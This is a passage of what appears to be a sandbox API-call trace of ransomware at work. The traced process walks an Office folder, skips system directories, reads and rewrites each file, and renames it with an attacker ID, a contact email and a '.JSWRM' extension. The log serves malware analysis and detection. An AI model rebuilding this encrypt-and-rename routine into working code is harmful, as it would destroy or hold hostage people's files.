ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad65103, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d13, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR33F.GIF", cAlternateFileName="")) returned 1 [0119.296] lstrcmpiW (lpString1="PDIR33F.GIF", lpString2=".") returned 1 [0119.296] lstrcmpiW (lpString1="PDIR33F.GIF", lpString2="..") returned 1 [0119.296] lstrcmpiW (lpString1="PDIR33F.GIF", lpString2="...") returned 1 [0119.296] lstrcmpiW (lpString1="PDIR33F.GIF", lpString2="windows") returned -1 [0119.296] lstrcmpiW (lpString1="PDIR33F.GIF", lpString2="recovery") returned -1 [0119.297] lstrcmpiW (lpString1="PDIR33F.GIF", lpString2="perflogs") returned -1 [0119.297] lstrcmpiW (lpString1="PDIR33F.GIF", lpString2="documents and settings") returned 1 [0119.297] lstrcmpiW (lpString1="PDIR33F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.297] lstrcmpiW (lpString1="PDIR33F.GIF", lpString2="system volume information") returned -1 [0119.297] lstrcmpiW (lpString1="PDIR33F.GIF", lpString2="msocache") returned 1 [0119.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR33F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR33F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR33F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0119.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR33F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR33F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR33F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0119.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0119.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0119.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR33F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir33f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.298] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=11539) returned 1 [0119.298] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d10) returned 0x24e1d8 [0119.298] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2d10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2d10, lpOverlapped=0x0) returned 1 [0119.309] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.309] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2d10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2d10, lpOverlapped=0x0) returned 1 [0119.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.309] CloseHandle (hObject=0x314) returned 1 [0119.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0119.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0119.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0119.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0119.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.310] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR33F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir33f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR33F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir33f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0119.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0119.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0119.311] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad65103, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1179, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR34B.GIF", cAlternateFileName="")) returned 1 [0119.311] lstrcmpiW (lpString1="PDIR34B.GIF", lpString2=".") returned 1 [0119.311] lstrcmpiW (lpString1="PDIR34B.GIF", lpString2="..") returned 1 [0119.311] lstrcmpiW (lpString1="PDIR34B.GIF", lpString2="...") returned 1 [0119.311] lstrcmpiW (lpString1="PDIR34B.GIF", lpString2="windows") returned -1 [0119.311] lstrcmpiW (lpString1="PDIR34B.GIF", lpString2="recovery") returned -1 [0119.311] lstrcmpiW (lpString1="PDIR34B.GIF", lpString2="perflogs") returned -1 [0119.311] lstrcmpiW (lpString1="PDIR34B.GIF", lpString2="documents and settings") returned 1 [0119.311] lstrcmpiW (lpString1="PDIR34B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.311] lstrcmpiW (lpString1="PDIR34B.GIF", lpString2="system volume information") returned -1 [0119.311] lstrcmpiW (lpString1="PDIR34B.GIF", lpString2="msocache") returned 1 [0119.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0119.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR34B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR34B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR34B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0119.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0119.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR34B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR34B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR34B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0119.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0119.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0119.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR34B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir34b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.312] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4473) returned 1 [0119.312] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1170) returned 0x24e1d8 [0119.312] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1170, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1170, lpOverlapped=0x0) returned 1 [0119.314] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.314] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1170, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1170, lpOverlapped=0x0) returned 1 [0119.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.314] CloseHandle (hObject=0x314) returned 1 [0119.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0119.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0119.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0119.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0119.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0119.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0119.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.315] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR34B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir34b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR34B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir34b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0119.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0119.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.315] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad65103, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x95dd, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR34F.GIF", cAlternateFileName="")) returned 1 [0119.316] lstrcmpiW (lpString1="PDIR34F.GIF", lpString2=".") returned 1 [0119.316] lstrcmpiW (lpString1="PDIR34F.GIF", lpString2="..") returned 1 [0119.316] lstrcmpiW (lpString1="PDIR34F.GIF", lpString2="...") returned 1 [0119.316] lstrcmpiW (lpString1="PDIR34F.GIF", lpString2="windows") returned -1 [0119.316] lstrcmpiW (lpString1="PDIR34F.GIF", lpString2="recovery") returned -1 [0119.316] lstrcmpiW (lpString1="PDIR34F.GIF", lpString2="perflogs") returned -1 [0119.316] lstrcmpiW (lpString1="PDIR34F.GIF", lpString2="documents and settings") returned 1 [0119.316] lstrcmpiW (lpString1="PDIR34F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.316] lstrcmpiW (lpString1="PDIR34F.GIF", lpString2="system volume information") returned -1 [0119.316] lstrcmpiW (lpString1="PDIR34F.GIF", lpString2="msocache") returned 1 [0119.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0119.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR34F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR34F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR34F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0119.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR34F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR34F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR34F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0119.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0119.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR34F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir34f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.317] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=38365) returned 1 [0119.317] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x95d0) returned 0x24e1d8 [0119.317] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x95d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x95d0, lpOverlapped=0x0) returned 1 [0119.366] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.366] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x95d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x95d0, lpOverlapped=0x0) returned 1 [0119.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.366] CloseHandle (hObject=0x314) returned 1 [0119.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0119.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0119.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0119.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0119.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0119.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0119.367] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR34F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir34f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR34F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir34f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0119.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0119.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0119.368] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad65103, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11ec, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR35B.GIF", cAlternateFileName="")) returned 1 [0119.368] lstrcmpiW (lpString1="PDIR35B.GIF", lpString2=".") returned 1 [0119.368] lstrcmpiW (lpString1="PDIR35B.GIF", lpString2="..") returned 1 [0119.368] lstrcmpiW (lpString1="PDIR35B.GIF", lpString2="...") returned 1 [0119.368] lstrcmpiW (lpString1="PDIR35B.GIF", lpString2="windows") returned -1 [0119.368] lstrcmpiW (lpString1="PDIR35B.GIF", lpString2="recovery") returned -1 [0119.368] lstrcmpiW (lpString1="PDIR35B.GIF", lpString2="perflogs") returned -1 [0119.368] lstrcmpiW (lpString1="PDIR35B.GIF", lpString2="documents and settings") returned 1 [0119.368] lstrcmpiW (lpString1="PDIR35B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.368] lstrcmpiW (lpString1="PDIR35B.GIF", lpString2="system volume information") returned -1 [0119.368] lstrcmpiW (lpString1="PDIR35B.GIF", lpString2="msocache") returned 1 [0119.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR35B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR35B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR35B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 